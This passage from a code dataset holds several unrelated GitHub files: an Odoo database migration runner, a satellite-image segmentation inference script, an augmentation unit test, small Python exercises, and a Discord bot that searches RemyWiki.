분해.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33134419631","text":"import logging\nimport os\nimport pathlib\nimport subprocess\n\n_logger = logging.getLogger(__name__)\n\n\ndef all_databases():\n result = subprocess.run([\"ociedoo\", \"list-db\"], check=True, stdout=subprocess.PIPE)\n output = result.stdout.decode(\"utf-8\")\n return [line for line in output.splitlines() if line]\n\n\ndef filter_databases(databases):\n return [database for database in databases if database.endswith(\"-test\")]\n\n\ndef main():\n os.chdir(pathlib.Path(__file__).parent)\n logging.basicConfig(level=logging.INFO)\n # don't filter databases\n # databases = filter_databases(all_databases())\n databases = filter_databases(all_databases())\n for database in databases:\n # don't create new DB\n new_database = database\n # _logger.info(f\"Removing {new_database} if it exists\")\n # subprocess.run([\"ociedoo\", \"drop-db\", new_database])\n # _logger.info(f\"Creating {new_database} from {database}\")\n # subprocess.run([\"ociedoo\", \"copy-db\", database, new_database], check=True)\n _logger.info(f\"Running renaming migration on {new_database}\")\n subprocess.run([\"./rename_deprecated_modules.sh\", new_database], check=True)\n _logger.info(f\"Done with renaming migration of {new_database}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"coopiteasy/vertical-cooperative","sub_path":"rename_all_deprecated_modules.py","file_name":"rename_all_deprecated_modules.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"21"} +{"seq_id":"33687583240","text":"from argparse import ArgumentParser\n\nimport logging\nimport time\nfrom sklearn import multiclass\nimport torch\nimport torchmetrics\nfrom torchmetrics import ConfusionMatrix\nfrom pytorch_lightning import LightningModule, Trainer, seed_everything\nfrom torch.nn import functional as F\nimport numpy as np\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom sklearn.metrics import ConfusionMatrixDisplay, confusion_matrix\nimport rasterio\nfrom rasterio import windows\nfrom 
rasterio.windows import Window\nfrom rasterio.transform import Affine\nfrom rasterio.crs import CRS\n\nfrom tqdm import tqdm\nfrom skimage.exposure import match_histograms\n\nfrom itertools import product\nimport matplotlib.pyplot as plt\n\n#from pl_bolts.models.vision.unet import UNet\nfrom unet_3enco_sum import unet_3enco_sum\nfrom pytorch_lightning.callbacks import Callback, ModelCheckpoint, LearningRateMonitor\n\n\n# Custom LR\nfrom utils import get_datasets_inference, get_datasets\nfrom dataset import inference_on_full_image_dataset\n\n# Custom loss\nfrom custom_loss import FocalLoss\n\n# Add to specified some tensor to GPU\ndevice = torch.device(\"cuda:0\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\nclass SemSegment(LightningModule):\n def __init__(\n self,\n #lr: float = 0.001,\n #num_classes: int = 19,\n num_classes: int = 8,\n #num_layers: int = 5,\n features_start: int = 64,\n bilinear: bool = True,\n\n ):\n \"\"\"\n Adapted from the implementation of `Annika Brundyn ` in PyTorch lightning\n\n Args:\n num_layers: number of layers in each side of U-net (default 5)\n features_start: number of features in first layer (default 64)\n bilinear: whether to use bilinear interpolation (True) or transposed convolutions (default) for upsampling.\n lr: learning (default 0.01)\n \"\"\"\n super().__init__()\n \n self.num_classes = num_classes\n self.num_layers = num_layers_main\n self.features_start = features_start\n self.bilinear = bilinear\n self.lr = lr_main\n self.new_time = time.time()\n self.train_time_list = []\n\n # Metrics \n # self.train_accuracy = torchmetrics.Accuracy(mdmc_average='samplewise')\n # self.val_accuracy = torchmetrics.Accuracy(mdmc_average='samplewise')\n # self.train_f1 = torchmetrics.F1Score(mdmc_average='samplewise')\n # self.val_f1 = torchmetrics.F1Score(mdmc_average='samplewise')\n\n # Model\n self.net = unet_3enco_sum(\n num_classes=num_classes,\n input_channels=input_channel_main,\n input_channels_lidar=input_channel_lidar,\n input_channels_radar=input_channel_radar,\n num_layers=self.num_layers,\n features_start=self.features_start,\n bilinear=self.bilinear,\n )\n\n # def forward(self, x):\n # return self.net(x)\n\n def forward(self, x, y, z):\n return self.net(x, y, z)\n\n @torch.no_grad()\n def test_step(self, batch, batch_idx):\n self.trainer.model.eval()\n\n #img, lidar, mask, radar, img_path = batch \n #img, lidar, radar, img_path = batch \n\n\n\n # # stack both sentinel 2 images\n # img_opt = np.dstack((sen2_ete_img, sen2_print_img))\n\n # #img_lidar = np.dstack((img_mnt, img_mhc, img_slopes, img_tpi, img_tri, img_twi))\n # img_lidar = np.dstack((img_mhc, img_slopes, img_tpi, img_tri, img_twi))\n\n # # if img_lidar.dtype != 'float32':\n # # img_lidar = np.float32(img_lidar) # Only for overlapping dataset #TODO\n # # else:\n # # pass\n\n\n # img_rad = np.dstack((sen1_ete_img, sen1_print_img)) # stack both sen-1 images\n\n # # Cast to tensor for better permute\n # img_opt = torch.from_numpy(img_opt)\n # img_opt = img_opt.permute(2,0,1)\n\n # # Apply standardization (see : discuss.pytorch.org/t/how-to-normalize-multidimensional-tensor/65304)\n # #img_opt = img_opt.sub_(combined_mean[:, None, None]).div_(combined_std[:, None, None])\n\n # k_lidar_means = torch.tensor([13.348262, 13.45669, -0.006740755, -3.689763, 5.7766604])\n # k_lidar_stds = torch.tensor([7.7406297, 13.942361, 1.3129127, 241.4134, 5.6496654])\n\n # img_lidar = torch.from_numpy(img_lidar)\n # img_lidar = img_lidar.permute(2,0,1)\n\n # # Standardization\n # img_lidar = 
img_lidar.sub_(k_lidar_means[:, None, None]).div_(k_lidar_stds[:, None, None])\n\n        # img_rad = torch.from_numpy(img_rad)\n        # img_rad = img_rad.permute(2,0,1)\n\n        # img = img_opt.float() # x\n        # lidar = img_lidar.float()\n        # #mask = mask.long() # y \n        # radar = img_rad.float() # z\n\n        # `bands` is assumed to be the stacked 35-band tile yielded by the dataloader\n        bands = batch[0]\n\n        img = bands[0:24]    # 24 optical bands (2 x 12 Sentinel-2)\n        radar = bands[24:30] # 6 radar bands (2 x 3 Sentinel-1)\n        lidar = bands[30:35] # 5 lidar bands\n\n        preds = self(img, lidar, radar) # predictions\n\n        # preds_temp = preds.argmax(dim=1).unsqueeze(1)\n        # preds_recast = preds_temp.type(torch.IntTensor).to(device=device) \n\n        # confmat = ConfusionMatrix(num_classes=8).to(device=device)\n        # conf_print = confmat(preds_recast, mask)\n        \n        #return {'conf matrice': conf_print, 'preds' : preds, 'img' : img, 'lidar' : lidar, 'mask' : mask, 'radar' : radar, 'img_path' : img_path}\n        #return {'preds' : preds, 'img' : img, 'lidar' : lidar, 'radar' : radar, 'img_path' : img_path}\n        \n    # @torch.no_grad()\n    # def test_epoch_end(self, outputs):\n    #     # TODO Add logs to test aswell?\n\n    #     for x in range(len(outputs)):\n    #         fig = plt.figure()\n    #         cm = outputs[x]['conf matrice'].cpu().numpy()\n    #         disp = ConfusionMatrixDisplay(confusion_matrix=cm)\n    #         disp.plot()\n    #         plt.savefig(\"lightning_logs/inference_{version}/cm_{num}.png\".format(version = log_version, num = x))\n    #         plt.close(fig)\n\n    #         # Extract CRS and transforms\n    #         img_path = outputs[x]['img_path']\n    #         src = rasterio.open(img_path[0])\n    #         sample_crs = src.crs\n    #         transform_ori = src.transform\n    #         src.close() # Needed?\n\n    #         ori_input = outputs[x]['img'][0].cpu().numpy()\n    #         ori_target = outputs[x]['mask'][0].cpu().numpy()\n    #         predict_sig = outputs[x]['preds'][0].cpu().argmax(dim=0).numpy().astype(np.int32)\n\n    #         # write predict image to file\n    #         tiff_save_path = \"lightning_logs/inference_{version}/predict_geo_{num}.tif\".format(version = log_version, num = x)\n    #         #tiff_save_path = \"lightning_logs/version_{version}/predict_geo_{num}.tif\".format(version = log_version, num = x)\n\n    #         predict_img = rasterio.open(tiff_save_path, 'w', driver='GTiff',\n    #                             height = input_tile_size, width = input_tile_size,\n    #                             count=1, dtype=str(predict_sig.dtype),\n    #                             crs=sample_crs,\n    #                             transform=transform_ori)\n\n    #         predict_img.write(predict_sig, 1)\n    #         predict_img.close()\n\n    #         fig = plt.figure()\n    #         plt.subplot(1,3,1)\n    #         plt.imshow(np.transpose(ori_input[[3,2,1],:,:],(1,2,0))*3)\n    #         plt.title(\"Input\")\n    #         plt.subplot(1,3,2)\n    #         plt.imshow(predict_sig)\n    #         plt.title(\"Predict\")\n    #         plt.subplot(1,3,3)\n    #         plt.imshow(ori_target)\n    #         plt.title(\"Target\")\n\n    #         plt.savefig(\"lightning_logs/inference_{version}/fig_{num}.png\".format(version = log_version, num = x))\n    #         plt.close(fig)\n\n    #     self.trainer.model.train()\n\n    # @staticmethod\n    # def add_model_specific_args(parent_parser):\n    #     parser = ArgumentParser(parents=[parent_parser], add_help=False)\n    #     parser.add_argument(\"--lr\", type=float, default=0.01, help=\"adam: learning rate\")\n    #     parser.add_argument(\"--num_layers\", type=int, default=5, help=\"number of layers on u-net\")\n    #     parser.add_argument(\"--features_start\", type=float, default=64, help=\"number of features in first layer\")\n    #     parser.add_argument(\n    #         \"--bilinear\", action=\"store_true\", default=False, help=\"whether to use bilinear interpolation or transposed\"\n    #     )\n\n    #     return parser\n\n# Utils functions outside of main class\n# Windowed iteration inspired by : https://gis.stackexchange.com/questions/396891/parsing-through-a-sentinel-2-tile\n## TODO Move create stack to utilities \ndef create_stacked_image():\n    file_list = 
[path_to_full_sen2_ete, path_to_full_sen2_print, path_to_full_sen1_ete, path_to_full_sen1_print, path_to_full_mhc, path_to_full_slopes, path_to_full_tpi, path_to_full_tri, path_to_full_twi]\n nb_of_layers = 35\n\n # Read metadata of first file\n with rasterio.open(file_list[0]) as src0:\n meta = src0.meta\n\n # Update meta to reflect the number of layers\n #meta.update(count = len(file_list))\n meta.update(count = nb_of_layers)\n\n # Read each layer and write it to stack\n # with rasterio.open('stack.tif', 'w', **meta) as dst:\n # for id, layer in enumerate(file_list, start=1):\n # print(id, layer)\n # with rasterio.open(layer) as src1:\n # dst.write_band(id, src1.read(1))\n\n with rasterio.open('/mnt/SN750/stack_with_STD_HM_v2.tif', 'w', **meta) as dst:\n id = 1\n for images in file_list:\n print(\"Writing image from : \", images)\n with rasterio.open(images) as src_tmp:\n array = src_tmp.read(out_dtype='float32')\n for bands in array:\n print(\"Writing bands no : \", id)\n dst.write_band(id, bands)\n id += 1\n\ndef iter_windows(src_ds, width, height, boundless=False):\n offsets = product(range(0, src_ds.meta['width'], width), range(0, src_ds.meta['height'], height))\n big_window = windows.Window(col_off=0, row_off=0, width=src_ds.meta['width'], height=src_ds.meta['height'])\n for col_off, row_off in offsets:\n\n window = windows.Window(col_off=col_off, row_off=row_off, width=width, height=height)\n\n if boundless:\n yield window\n else:\n yield window.intersection(big_window)\n\n# def iter_windows_no_meta(src_ds, width, height, boundless=False):\n\n# offsets = product(range(0, src_ds.shape[1], width), range(0, src_ds.shape[2], height))\n# big_window = windows.Window(col_off=0, row_off=0, width=src_ds.shape[1], height=src_ds.shape[2])\n# for col_off, row_off in offsets:\n\n# window = windows.Window(col_off=col_off, row_off=row_off, width=width, height=height)\n\n# if boundless:\n# yield window\n# else:\n# yield window.intersection(big_window)\n\n# From : https://pyimagesearch.com/2015/03/23/sliding-windows-for-object-detection-with-python-and-opencv/\n# Input image shape should be C x H x W\n\ndef iter_windows_no_meta(src_ds, stepsize, height, width):\n for y in range(0, src_ds.shape[1], stepsize):\n for x in range(0, src_ds.shape[2], stepsize):\n yield (x, y, src_ds[:, y:y + height, x:x + width])\n\ndef inference_from_ckpt(ckpt_path, bands):\n model = SemSegment.load_from_checkpoint(\n checkpoint_path=ckpt_path,\n )\n\n #trainer = Trainer(accelerator='gpu', devices=1)\n #trainer.test(model)\n #trainer.predict(model, dataloaders=None)\n #img_sen2_print = \n\n\n # Input need shape (B X C X H X W) where B is the batchsize, that is why we unsqueeze to have B = 1\n img = torch.from_numpy(bands[0:24]).unsqueeze(0)\n radar = torch.from_numpy(bands[24:30]).unsqueeze(0)\n\n lidar = torch.from_numpy(bands[30:35])\n\n # Temporary std and means for lidar\n k_lidar_means = torch.tensor([13.348262, 13.45669, -0.006740755, -3.689763, 5.7766604])\n k_lidar_stds = torch.tensor([7.7406297, 13.942361, 1.3129127, 241.4134, 5.6496654])\n\n estrie_lidar_mean = torch.tensor([7.798849, 5.5523205, 0.0029951811, 0.06429929, 6.7409873])\n estrie_lidar_std = torch.tensor([7.033332, 5.196636, 1.0641352, 0.06102526, 3.182435])\n\n lidar = lidar.sub_(k_lidar_means[:, None, None]).div_(k_lidar_stds[:, None, None])\n #lidar = lidar.sub_(estrie_lidar_mean[:, None, None]).div_(estrie_lidar_std[:, None, None])\n\n lidar = lidar.unsqueeze(0)\n\n model.eval()\n pred = model(img, lidar, radar)\n\n #pred_temp = 
pred.argmax(dim=1).unsqueeze(1)\n #pred_recast = pred_temp.type(torch.IntTensor).to(device=device) \n\n predict_sig = pred[0].detach().argmax(dim=0) #.numpy().astype(np.int16)\n #predict_sig = pred.detach().argmax(dim=1) #.numpy() #.astype(np.int16)\n\n return predict_sig\n\n# #TODO move to utils when clean\n# def histo_matching(target_arr, ref_arr):\n\n\n# ar_k = match_histograms(target_arr, ref_arr channel_axis=0)\n\n\nif __name__ == \"__main__\":\n # Activate logging\n logging.basicConfig()\n\n # Optional timer activation\n #start_time_glob = time.time()\n\n # Model parameters\n num_layers_main = 4\n lr_main = 0.001\n input_channel_main = 24\n input_channel_lidar = 5\n input_channel_radar = 6\n\n ## TODO Move create stack to utilities \n # Paths to original data (no standardization or histogram matching)\n # path_to_full_sen2_ete = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/sen2/ete/s2_kenauk_3m_ete_aout2020.tif'\n # path_to_full_sen2_print = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/sen2/print/S2_de_kenauk_3m_printemps_mai2020.tif' \n # path_to_full_sen1_ete = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/sen1/ete/s1_kenauk_3m_ete_aout2020.tif' \n # path_to_full_sen1_print = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/sen1/print/S1_kenauk_3m_printemps_mai2020.tif' \n # path_to_full_mhc = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/mhc_kenauk_3m.tif' \n # path_to_full_slopes = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/pentes_kenauk_3m.tif' \n # path_to_full_tpi = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/tpi_kenauk_3m.tif' \n # path_to_full_tri = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/tri_kenauk_3m.tif' \n # path_to_full_twi = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/twi_kenauk_3m.tif' \n\n # Paths to standardize and/or histogram matched dataa\n path_to_full_sen2_ete = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/raw_standard/s2_kenauk_3m_ete_HMe_STD.tif' \n path_to_full_sen2_print = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/raw_standard/s2_kenauk_3m_print_HMe_STD.tif' \n path_to_full_sen1_ete = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/raw_standard/s1_kenauk_3m_ete_STD.tif' \n path_to_full_sen1_print = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/raw_standard/s1_kenauk_3m_print_STD.tif' \n path_to_full_mhc = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/mhc_kenauk_3m.tif' \n path_to_full_slopes = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/pentes_kenauk_3m.tif' \n path_to_full_tpi = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/tpi_kenauk_3m.tif' \n path_to_full_tri = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/tri_kenauk_3m.tif' \n path_to_full_twi = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/twi_kenauk_3m.tif' \n\n #create_stacked_image()\n\n # with rasterio.open(path_to_full_tri) as dst:\n # array = dst.read(out_dtype='float32')\n # for bands in array:\n # print(bands)\n\n # # id = 1\n # # for images in file_list:\n # # print(\"Writing image from : \", images)\n # # with rasterio.open(images) as src_tmp:\n # # array = src_tmp.read(out_dtype='float32')\n # # for bands in array:\n # # print(\"Writing bands no : \", id)\n # # dst.write_band(id, 
bands)\n # # id += 1\n\n size = 256\n path_to_stack_img = '/mnt/SN750/stack_with_STD_HM_v2.tif'\n\n # #TODO automatiser les paths\n # # Evaluate \n ckpt_path = \"/mnt/Data/01_Codes/00_Github/Unet_lightning/lightning_logs/version_182/checkpoints/epoch=48-step=41797.ckpt\"\n #ckpt_path = \"/mnt/Data/01_Codes/00_Github/Unet_lightning/lightning_logs/version_182/checkpoints/epoch=46-step=40091.ckpt\"\n log_version = \"182_kenauk_2020_4\"\n\n #With premade stack \n logging.info('Starting prediction on full image')\n with rasterio.open(path_to_stack_img) as ds:\n profile = ds.profile\n profile['count'] = 1 # assume output is a single band raster\n with rasterio.open(path_to_stack_img.replace(\".tif\", \"_clc_nometa_std_hm_sen2_tpi_correct_v4_estrie.tif\"), \"w\", **profile) as out_ds:\n #for window in tqdm(iter_windows(ds, size, size), total=len(list(iter_windows(ds, size, size))), desc='Predicting and creating output'):\n for window in tqdm(iter_windows(ds, size, size), total=len(list(iter_windows(ds, size, size))), desc='Predicting and creating output'):\n bands = ds.read(window=window, out_dtype='float32')\n tile = inference_from_ckpt(ckpt_path, bands)\n out_ds.write(tile, 1, window=window)\n logging.info('Prediction finished')\n\n\n ## With loading data directly\n # profile_temp = {'driver': 'GTiff', \n # 'dtype': 'uint16', \n # 'nodata': None, \n # 'width': 7836, \n # 'height': 6101, \n # 'count': 1, \n # 'crs': CRS.from_epsg(32198), \n # 'transform': Affine(3.0, 0.0, -544994.0388, 0.0, -3.0, 234380.8231), \n # 'tiled': False, 'interleave': 'pixel'}\n\n\n # logging.info('Starting prediction on full image')\n\n # with rasterio.open(path_to_stack_img) as ds:\n # # sentinel 2 images\n # sen2_ete_img = ds.read((1,2,3,4,5,6,7,8,9,10,11,12), out_dtype='float32')\n # sen2_print_img = ds.read((13,14,15,16,17,18,19,20,21,22,23,24), out_dtype='float32')\n\n # # sentinel-1 images\n # sen1_ete_img = ds.read((25,26,27), out_dtype='float32')\n # sen1_print_img = ds.read((28,29,30), out_dtype='float32')\n\n # # lidar images\n # img_mhc = np.expand_dims(ds.read((31), out_dtype='float32'), 0)\n # img_slopes = np.expand_dims(ds.read((32), out_dtype='float32'), 0)\n # img_tpi = np.expand_dims(ds.read((33), out_dtype='float32'), 0)\n # img_tri = np.expand_dims(ds.read((34), out_dtype='float32'), 0)\n # img_twi = np.expand_dims(ds.read((35), out_dtype='float32'), 0)\n\n # full_array = np.concatenate((sen2_ete_img, sen2_print_img, sen1_ete_img, sen1_print_img, img_mhc, img_slopes, img_tpi, img_tri, img_twi))\n\n # profile = profile_temp\n # #profile['count'] = 1 # assume output is a single band raster\n\n # with rasterio.open(path_to_stack_img.replace(\".tif\", \"_clc_nometa_std_hm_sen2_lidar.tif\"), \"w\", **profile) as out_ds:\n # #for window in tqdm(iter_windows(ds, size, size), total=len(list(iter_windows(ds, size, size))), desc='Predicting and creating output'):\n # for window in tqdm(iter_windows_no_meta(full_array, size, size, size), total=len(list(iter_windows_no_meta(full_array, size, size, size))), desc='Predicting and creating output'):\n # #bands = ds.read(window=window, out_dtype='float32')\n # tile = inference_from_ckpt(ckpt_path, window[2])\n # out_ds.write(tile, 1, window=Window(window[0], window[1], window[2].shape[2], window[2].shape[1]))\n\n # logging.info('Prediction 
finished')\n","repo_name":"LucaRom/deep_mh","sub_path":"inference_3enco_full_img.py","file_name":"inference_3enco_full_img.py","file_ext":"py","file_size_in_byte":19963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19950366568","text":"\"\"\"Test augmentation options object.\"\"\"\nfrom schoolnn.models import AugmentationOptions\nfrom numpy import array_equal, random\n\n\n_KEYS = [\n    \"channel_shuffle\",\n    \"brightness\",\n    \"gaussian_noise\",\n    \"dropout_boxes\",\n    \"salt_and_pepper\",\n    \"jpeg_artifacts\",\n    \"vertical_flip\",\n    \"distortion\",\n    \"rotate\",\n    \"scale_and_translate\",\n    \"color\",\n]\n\n\ndef test_augmentation_options_from_to_dict():\n    \"\"\"Create some options, dump and read them back.\"\"\"\n    for disabled_option in _KEYS:\n        # Activate everything but one option\n        kwargs = {}\n        for key in _KEYS:\n            kwargs[key] = True\n        kwargs[disabled_option] = False\n\n        opt = AugmentationOptions(**kwargs)\n        assert opt.get_augmenter()  # Don't fail\n\n        assert opt.to_dict() == kwargs\n        assert opt.activated_count() == len(_KEYS) - 1\n\n\ndef test_augmentation_options_from_to_dict2():\n    \"\"\"Create some options, dump and read them back.\"\"\"\n    for enabled_option in _KEYS:\n        # Activate nothing but one option\n        kwargs = {}\n        for key in _KEYS:\n            kwargs[key] = False\n        kwargs[enabled_option] = True\n\n        opt = AugmentationOptions(**kwargs)\n        assert opt.get_augmenter()  # Don't fail\n\n        assert opt.to_dict() == kwargs\n        assert opt.activated_count() == 1\n\n\ndef test_augmentation_options_identity():\n    \"\"\"Check if identity applies when no option is enabled.\"\"\"\n    kwargs = {}\n    for key in _KEYS:\n        kwargs[key] = False\n\n    opt = AugmentationOptions(**kwargs)\n    assert opt.to_dict() == kwargs\n    assert opt.activated_count() == 0\n\n    random_image_array = 255 * random.rand(28, 28, 3)\n    random_image_array = random_image_array.astype(\"uint8\")\n\n    augmented_image = opt.get_augmenter()(image=random_image_array)\n\n    assert array_equal(augmented_image, random_image_array)\n\n\ndef test_augmentation_options_augmentation():\n    \"\"\"Do some augmentation.\"\"\"\n    aug_options = AugmentationOptions.all_activated()\n    full_augmenter = aug_options.get_augmenter()\n\n    batch_size = 32\n    image_side = 128\n    image_batch = 255 * random.rand(batch_size, image_side, image_side, 3)\n    image_batch = image_batch.astype(\"uint8\")\n\n    augmented_batch = full_augmenter(images=image_batch)\n\n    assert augmented_batch.shape == image_batch.shape\n    assert not array_equal(image_batch, augmented_batch)\n","repo_name":"DennisNemec/school-nn","sub_path":"tests/unit/models/test_augmentation_options.py","file_name":"test_augmentation_options.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13191477857","text":"#!/usr/bin/python3\n\nimport math \ne = 50\nrntp = []\n\ndef tnp1(l):\n    if l==1:\n        return 1\n    else:\n        return tnp1(l-1) * 2 + 1\n    \nrntp.append(0) \nfor i in range(1,e):\n    rntp.append(rntp[i-1] * 2 +1)\n\n\ndef rtnp1(l):\n    k = 0\n    while True:\n        if rntp[k] >= l:\n            return k\n        k += 1\n        if k>e:\n            raise RuntimeError(\"ojojoj\")\n    \n\ndef process():\n    [l, p , c] = [int(i) for i in input().split()]\n    n = math.ceil(math.log(p/l,c))\n    return rtnp1(n - 1) \n    \n\n\nif __name__ == '__main__': \n    for i in range(int(input())):\n        print(\"Case #{0}: {1}\".format(i+1,process()))\n    \n    
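\n# Added note (not from the original author): rntp[k] == 2**k - 1, i.e.\n# [0, 1, 3, 7, 15, ...], so rtnp1(m) returns the least k with 2**k - 1 >= m;\n# e.g. rtnp1(4) == 3 because 2**3 - 1 = 7 >= 4 while 2**2 - 1 = 3 < 4.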
\n\n","repo_name":"elek/codejam","sub_path":"codejam/2010/10r1c/load_testing/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31353532113","text":"# PROG1 - UFCG\n# MATRICULA: 120210785 | DATA: 10/03/2022\n# ALUNO: EMANUEL VINICIUS SÁ DE LIMA E LIMA\n# PROGRAMA QUE COMPARA DUAS STRING E CONTA OS CARACTERES DIFERENTES \n\ndef compara_senhas(senha1, senha2):\n \n count = 0\n if len(senha1) <= len(senha2):\n for caracter in range(len(senha1)):\n if senha1[caracter] != senha2[caracter]:\n count += 1\n elif len(senha2) <= len(senha1):\n for caracter in range(len(senha2)):\n if senha2[caracter] != senha1[caracter]:\n count += 1\n\n\n return count\n\n\nassert compara_senhas('nome123', 'nome') == 0\nassert compara_senhas('aaa', 'bbb') == 3\nassert compara_senhas('senha', 'Senha') == 1\n\n","repo_name":"EmanuelSal/Atividades_Programacao-1","sub_path":"questões_tst/compara_senhas/compara.py","file_name":"compara.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6824221132","text":"import discord, pycurl, re, wget, certifi, html\nfrom io import BytesIO\n\nbuffer = BytesIO()\nc = pycurl.Curl()\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n await client.change_presence(activity=discord.Game(name=\"$r help\"))\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n commande = '$r '\n if message.content == \"$r help\":\n \thelping = \"Use \\\" $r \\\" followed with your search query to use RemyWiki's search engine directly on discord. 
assert compara_senhas('nome123', 'nome') == 0\nassert compara_senhas('aaa', 'bbb') == 3\nassert compara_senhas('senha', 'Senha') == 1\n\n","repo_name":"EmanuelSal/Atividades_Programacao-1","sub_path":"questões_tst/compara_senhas/compara.py","file_name":"compara.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6824221132","text":"import discord, pycurl, re, wget, certifi, html\nfrom io import BytesIO\n\nbuffer = BytesIO()\nc = pycurl.Curl()\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n    print('We have logged in as {0.user}'.format(client))\n    await client.change_presence(activity=discord.Game(name=\"$r help\"))\n\n@client.event\nasync def on_message(message):\n    if message.author == client.user:\n        return\n    commande = '$r '\n    if message.content == \"$r help\":\n    \thelping = \"Use \\\" $r \\\" followed with your search query to use RemyWiki's search engine directly on discord. \\n **Example** : $r THE SAFARI\"\n \tawait message.channel.send(helping)\n\n    elif message.content.startswith(commande):\n    \t#Prepare the curl request\n    \tmsg = '' + message.content\n    \targument = msg.replace(commande, '').replace(\"\\\"\", \"\\'\").replace('\\'', '%27')\n    \trequete = \"https://remywiki.com/api.php?action=query&list=search&srsearch=\" + argument + \"&format=json\"\n    \tc.setopt(c.CAINFO, certifi.where())\n    \tc.setopt(c.URL, requete)\n    \tc.setopt(c.WRITEDATA, buffer)\n    \tc.perform()\n    \tjson = buffer.getvalue().decode('utf-8')\n    \tbuffer.truncate(0)\n    \t#Collect the titles returned and keep at most 9 of them\n    \ttitles = re.findall(r\"\\\"title\\\":\\\".+?\\\"\", json)\n    \ttitles = [title.replace(\"\\\"\" , \"\").replace(\"title:\", \"\") for title in titles]\n    \t#Show an error if the search gives no result\n    \tif len(titles) == 0:\n    \t\turl_afficher = \"No result found !\"\n    \telse:\n    \t\tminiature = \"https://remywiki.com/wiki.png\"\n\t    \tlinks = re.findall(r\"\\\"pageid\\\":.+?,\", json)\n\t    \tlinks = [link.replace(\"\\\"\" , \"\").replace(\"pageid:\", \"\").replace(\",\", \"\") for link in links]\n\t    \tif titles[0].lower() == argument.lower() :\n\t    \t\ttitre_embed = titles[0]\n\t    \t\t#If a page title matches the query exactly, link that page directly\n\t    \t\trequete = \"https://remywiki.com/?curid=\" + links[0]\n\t    \t\tc.setopt(c.URL, requete)\n\t    \t\tc.setopt(c.WRITEDATA, buffer)\n\t    \t\tc.perform()\n\t    \t\tjson = buffer.getvalue().decode('utf-8')\n\t    \t\turl_afficher = requete.replace(\" \", \"%20\")\n\t    \t\t#If the page has images, show one as the preview image\n\t    \t\tif len(re.findall(r\"thumb tright.+?src.+?png.+?png\" ,json)) !=0:\n\t    \t\t\timage = re.sub(r\"thumb tright.+?src=\", \"https://remywiki.com\" ,re.findall(r\"thumb tright.+?src.+?png.+?png\" ,json)[0]).replace(\"\\\"\", \"\")\n\t    \t\telif len(re.findall(r\"thumb tright.+?src.+?jpg.+?jpg\" ,json)) !=0:\n\t    \t\t\timage = re.sub(r\"thumb tright.+?src=\", \"https://remywiki.com\" ,re.findall(r\"thumb tright.+?src.+?jpg.+?jpg\" ,json)[0]).replace(\"\\\"\", \"\")\n\t    \t\telse:\n\t    \t\t\timage = \"https://remywiki.com/wiki.png\"\n\t    \t\t#If the page found is a song, prepare the preview accordingly\n\t    \t\tif len(re.findall(r\"Song Information\", json)) !=0 :\n\t    \t\t\tartist = re.sub(\"<..*?>\", \"\", re.findall(r\"Artist:.*\", json)[0]).replace(\"Artist: \", \"\")\n\t    \t\t\tif len(re.findall(r\"Composition\\/Arrangement:.*.+?\\.\", json)) != 0:\n\t    \t\t\t\tdesc = re.sub(\"<..*?>\", \"\", re.findall(r\"Composition\\/Arrangement:.*.+?\\.\", json)[0])\n\t    \t\t\telse:\n\t    \t\t\t\tdesc = \"\"\n\t    \t\t\tdescription = desc\n\t    \t\t#Otherwise assume an artist page and build a profile preview\n\t    \t\telse:\n\t    \t\t\tname = re.sub(\"<..*?>\", \"\", re.findall(r\"Name:.+?\\.\", json)[0]).replace(\"Name: \", \"\")\n\t    \t\t\tbirthdate = re.sub(\"<..*?>\", \"\", re.findall(r\"Birthdate:.+?\\.\", json)[0]).replace(\"Birthdate: \", \"\")\n\t    \t\t\tartist = name\n\t    \t\t\tif len(re.findall(r\"<.>.+?\\.\", json)) != 0:\n\t    \t\t\t\tdesc = re.sub(\"<..*?>\", \"\", 